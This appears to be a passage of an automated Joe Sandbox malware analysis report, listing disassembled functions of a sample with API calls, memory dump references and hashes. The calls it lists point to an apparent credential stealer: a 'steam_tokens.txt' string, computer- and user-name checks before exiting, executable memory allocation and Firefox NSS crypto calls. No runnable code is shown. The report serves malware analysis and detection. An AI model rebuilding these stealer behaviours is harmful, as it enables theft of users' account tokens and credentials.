Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

lstrlenA.KERNEL32(00000000,00000000,00420ACE,?,?,?,?,?,?,0041635B,?), ref: 0041537A

Strings

steam_tokens.txt, xrefs: 0041538F

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 0eef1eb1fbf94ae16ef1a8794342b269a3f88c84263719e1fb3e80615d0468d5
Instruction ID: 583e1202a90f05d24a8fafb6f0fe3048dc9e4c24137b9a3722a1f5dcf54c1db9
Opcode Fuzzy Hash: 0eef1eb1fbf94ae16ef1a8794342b269a3f88c84263719e1fb3e80615d0468d5
Instruction Fuzzy Hash: 5AF06D31E1110876CB04FBB2EC679ED733D9E50358F80426EB416220D2EF386698C7AE

Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
ExitProcess.KERNEL32 ref: 0040117E

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66

Function 0040B4C0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrlenA.KERNEL32(00000000), ref: 0040B992
lstrlenA.KERNEL32(00000000), ref: 0040B9A6

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$memcmp
String ID:
API String ID: 3457870978-0
Opcode ID: ba79b2e7a0c15f5d76c0ebd99dcfb013275b843afc32a86d1060ec103db3ab25
Instruction ID: 2255bc3e1aae02863dcd83073914f46634cd1c5da6bc7bd4c07d15e0a17c61c2
Opcode Fuzzy Hash: ba79b2e7a0c15f5d76c0ebd99dcfb013275b843afc32a86d1060ec103db3ab25
Instruction Fuzzy Hash: BAE14672A111189BCB04FBA1DD66EEE7339AF14314F40459EF10672095EF387B98CB6A

Function 0040AEC0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

lstrlenA.KERNEL32(00000000), ref: 0040B13A
lstrlenA.KERNEL32(00000000), ref: 0040B14E

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 77cdd6c472262a762a0d5a3ab71b399cf2c8d325248b2c07a8503a021ea4363c
Instruction ID: b118e420acb74f1bad9678fc0f4fca3608bd39bb9752133bd9c886ddfd0b535b
Opcode Fuzzy Hash: 77cdd6c472262a762a0d5a3ab71b399cf2c8d325248b2c07a8503a021ea4363c
Instruction Fuzzy Hash: A8916672A151089BCB04FBA1DC66DEE7339AF14314F40456FF10663195EF387A98CB6A

Function 0040B200 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

lstrlenA.KERNEL32(00000000), ref: 0040B3FE
lstrlenA.KERNEL32(00000000), ref: 0040B412

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 018d9afcd2953914d4d12504db4ef13fed1128098a4d5030a57a10d2f27bf64c
Instruction ID: df39fec182a976cf14ea74314fd1cc2d61bc45c83f0c5b543270b10835f39725
Opcode Fuzzy Hash: 018d9afcd2953914d4d12504db4ef13fed1128098a4d5030a57a10d2f27bf64c
Instruction Fuzzy Hash: B4715271A111089BCB04FBA1DCA6DEE733AAF14314F40456FF50267195EF387A58CBAA

Function 004066B0 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00406E0E,00406E0E,00003000,00000040), ref: 00406756
VirtualAlloc.KERNEL32(00000000,00406E0E,00003000,00000040), ref: 004067A3

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bff2cd72ca51f604b8cae6ffaccc6788292cd5c635fa360249288f38c6295135
Instruction ID: 1e55e6aee22da07579867dcc14e26085db0c1923c06382e7ddd462ac09197dec
Opcode Fuzzy Hash: bff2cd72ca51f604b8cae6ffaccc6788292cd5c635fa360249288f38c6295135
Instruction Fuzzy Hash: 6041D474A00209EFCB54CF58C494BADBBB1FF44314F1486A9E949AB385D735EA91CF84

Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
Opcode Fuzzy Hash: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4

Function 00418F20 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ebce67ff82ee750330f5be80fd7ef0bb92a74565e563d7a981860eca1a149883
Instruction ID: 622f2f336d6b1c39152e8ed1c6124f6159486e78b27092244718ebba6cc61b65
Opcode Fuzzy Hash: ebce67ff82ee750330f5be80fd7ef0bb92a74565e563d7a981860eca1a149883
Instruction Fuzzy Hash: 7EF01C70D0520CEBCB00EF94D4496DDBB75EB00324F10819AE82967280DB385B96CB89

Function 00418F70 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 6d5c486f1174f401a7d52f4a33802c5c22497fe214560b0ce90e5b19e21db00a
Instruction ID: e79076dc3140f9edc5567924fb21932d6a0b2d79ef3805787682db2ce51b8011
Opcode Fuzzy Hash: 6d5c486f1174f401a7d52f4a33802c5c22497fe214560b0ce90e5b19e21db00a
Instruction Fuzzy Hash: 92E0127194434C6BDB51DB50CC96FDD776D9B44B11F004295BA0C5B1C0DE70AB858B95

Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169

Function 00409910 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000020,004108B9,?,?), ref: 00409918

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 3912ae89892860816b228f59aaf213fb868172a610b0e449912dea322eeca367
Instruction ID: 7a81cf42230454625edcc1d807e760a9f48c6c1e1b7ee97c20b10c4417f739aa
Opcode Fuzzy Hash: 3912ae89892860816b228f59aaf213fb868172a610b0e449912dea322eeca367
Instruction Fuzzy Hash: F3F054B4D00208FBDB00EFA5C846B9EBBB49B08304F1085A9F905A7381E674AB14CB95

Non-executed Functions

Function 6CFA6D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6D0AA8EC,0000006C), ref: 6CFA6DC6
memcpy.VCRUNTIME140(?,6D0AA958,0000006C), ref: 6CFA6DDB
memcpy.VCRUNTIME140(?,6D0AA9C4,00000078), ref: 6CFA6DF1
memcpy.VCRUNTIME140(?,6D0AAA3C,0000006C), ref: 6CFA6E06
memcpy.VCRUNTIME140(?,6D0AAAA8,00000060), ref: 6CFA6E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFA6E38

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6CFA6E76
TlsGetValue.KERNEL32 ref: 6CFA726F
EnterCriticalSection.KERNEL32(?), ref: 6CFA7283

Strings

!, xrefs: 6CFA7123

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: b115faca2ab6c375df3d6fc12b7611c90cc4cf462bfb2414e98e312ec6750b59
Instruction ID: e72b879a84db60dd2f15ce3ec04056f5d972dfb9ef91339367401d40bd9698f6
Opcode Fuzzy Hash: b115faca2ab6c375df3d6fc12b7611c90cc4cf462bfb2414e98e312ec6750b59
Instruction Fuzzy Hash: D4729F75D05219DFDF60CF68CC88B9ABBB5AF48304F1441AAE80DA7345EB319A85CF91

